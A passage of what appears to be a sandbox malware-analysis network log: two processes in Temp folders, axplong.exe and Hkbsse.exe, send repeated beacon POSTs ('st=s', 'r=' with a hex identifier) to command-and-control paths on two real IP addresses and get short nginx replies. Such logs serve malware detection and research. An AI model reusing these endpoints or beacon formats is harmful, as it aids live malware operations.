Jun 24, 2024 00:10:54.947951078 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:55.140146971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	52925	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:54.408082962 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:55.106936932 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:55.109184980 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:55.337752104 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	52927	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:55.263190985 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:55.898148060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:55.898925066 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:56.090509892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	52928	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:55.447676897 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:56.133718967 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:56.134516001 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:56.356802940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	52930	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:56.216056108 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:56.860852957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:56.861805916 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:57.054023981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	52931	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:56.476939917 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:57.192163944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:57.192799091 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:57.423680067 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	52932	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:57.164166927 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:57.800939083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:57.801825047 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:57.994488001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	52933	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:57.540607929 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:58.228049040 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:58.229038954 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:58.447602987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	52934	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:58.103915930 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:58.738627911 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:58.739391088 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:58.929490089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	52936	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:58.554975986 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:59.252134085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:59.255239964 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:10:59.473120928 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	52937	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:59.039486885 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:10:59.699733973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:10:59.700609922 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:10:59.896569967 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:10:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	52938	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:10:59.586499929 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:00.302325010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:00.303185940 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:00.532176971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	52939	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:00.008187056 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:00.640816927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:00.641691923 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:00.836767912 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	52940	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
